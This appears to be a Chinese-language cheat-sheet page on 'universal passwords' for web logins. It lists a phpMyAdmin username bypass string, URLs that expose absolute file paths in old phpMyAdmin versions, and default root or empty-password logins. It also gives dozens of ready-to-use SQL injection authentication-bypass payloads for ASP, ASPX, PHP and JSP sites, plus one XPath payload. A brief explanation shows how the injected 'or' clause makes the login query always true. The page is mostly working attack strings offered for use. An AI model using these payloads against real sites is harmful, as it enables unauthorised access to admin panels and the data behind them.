前言:将web漏洞中万能密码也归类于弱口令篇。
1.phpmyadmin
phpmyadmin万能密码
其实应该叫phpmyadmin万能账号,因为是在帐号处输入漏洞信息,而密码不需要输入
用户名处写入'localhost'@'@"则登录成功,密码无需输入 (全部为英文标点符号)
phpmyadmin 爆绝对路径
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php
漏洞影响版本 2.11.4 , 2.11.3
phpmyadmin弱口令
phpMyAdmin默认账号密码
用户名 root
密码 root
或空登陆。
phpmyadmin root空密码
用户名 root 登陆,无需密码。
漏洞影响版本 2.11.9.2
2.web后台站万能密码
admin'or'1'='1
'UNION SELECT 1, 'anotheruser', 'doesnt matter', 1–
"or"a"="a
'xor
'or'='or'
(asp、aspx的万能密码)
1:"or "a"="a
2:')or('a'='a
3:'or'='or'
4:'or 1=1–
5:a'or' 1=1–
6:"or 1=1–
7:'or'a'='a
8:"or"="a'='a
9:'or"='
10:admin'or'1=1
11:1 or '1'='1'=1
12:1 or '1'='1' or 1=1
13:'OR 1=1%00
14:'or 1=1%00
15:'xor
'or'='or'
(PHP的万能密码)
or 1=1/*
User:something
Pass:OR 1=1
(jsp的万能密码)
1or1=1
admin OR 1=1/*
xpath注入万能密码
"or 1=1 or "='
万能密码原理:
由于一些网站后台输入账号密码未进行字符过滤导致sql注入万能密码
如下为 登陆源码语句
select * from user where username='$user' and password ='$pass'
输入万能密码 'or'1'='1
select * from user where username=''or '1'='1' and password ='' or'1'='1'
可以看到 or 直接绕过,使得判断逻辑语句一直为真,对于一些代码可以进行绕过万能密码进入后台,这样SQL返回的值始终为1,就成功绕过了程序的验证。
网友评论